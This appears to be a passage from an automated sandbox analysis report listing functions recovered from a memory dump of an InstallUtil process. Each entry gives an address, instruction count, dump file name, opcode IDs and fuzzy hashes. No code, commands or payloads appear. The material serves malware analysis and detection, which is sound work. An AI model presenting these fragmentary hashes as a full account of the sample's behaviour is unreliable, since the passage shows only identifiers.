                                                                      • Instruction Fuzzy Hash: 17D0677BB41018DFCB049F99E8408DDB7B6FB9C221B148516E915E3261C6319921DB54
                                                                      Function 022A5EA8 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86c6e5ed8ae2cba25de0b1bad117a1dd7e9b5658ded02a182bbd3d269f13a97d
                                                                      • Instruction ID: 46ba5ed3e63df5c62d77447540ab5b86ea22384aca76d23440710985ba0ff64a
                                                                      • Opcode Fuzzy Hash: 86c6e5ed8ae2cba25de0b1bad117a1dd7e9b5658ded02a182bbd3d269f13a97d
                                                                      • Instruction Fuzzy Hash: D3D02B305483851FC712F330E9A64E87F31EA80204F50C1F5EC510915FDA79484F8B10
                                                                      Function 022AFBEB Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebff61c858ad4ff4d8e3e2e58da49ab58ff738f2becccd53b1a2e08acc9df12b
                                                                      • Instruction ID: 9eedfe19ed1605c0f8bf2b6ac1cf300369c3d6d246aed7b9e4084f6c1410cacf
                                                                      • Opcode Fuzzy Hash: ebff61c858ad4ff4d8e3e2e58da49ab58ff738f2becccd53b1a2e08acc9df12b
                                                                      • Instruction Fuzzy Hash: 9BD06C79D5412C8BCB24EFA8EA552ECB7B1EB99300F0014E6D909B3A14D7705AA48F11
                                                                      Function 022A5EB8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb7e98a06f6ebbe957175591c2a7f331ead462813bcccfefcbbe89bd101a749c
                                                                      • Instruction ID: 69d485a5dd67d60852693a51d8ea77102e02be74da267c70420e7634eda43640
                                                                      • Opcode Fuzzy Hash: eb7e98a06f6ebbe957175591c2a7f331ead462813bcccfefcbbe89bd101a749c
                                                                      • Instruction Fuzzy Hash: 88C012306843094FC505F775EA455A57B6AA6C0300F80C560B5190A26EDF7459884690

                                                                      Non-executed Functions

                                                                      Function 022A6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                                      • API String ID: 0-3001612457
                                                                      • Opcode ID: 923be4fb4f132e0bb0d92c0230619f334a5f45a5472d0f87dbeb44e31359eeed
                                                                      • Instruction ID: c861df052f60e59b7e9b858ec30d7bd97bae6c6d319be071fc1f7e33ff560577
                                                                      • Opcode Fuzzy Hash: 923be4fb4f132e0bb0d92c0230619f334a5f45a5472d0f87dbeb44e31359eeed
                                                                      • Instruction Fuzzy Hash: AD019E317201159F8F648AACC465A3577EFBF88B60319416AE102CB7B8DBA2DC81C740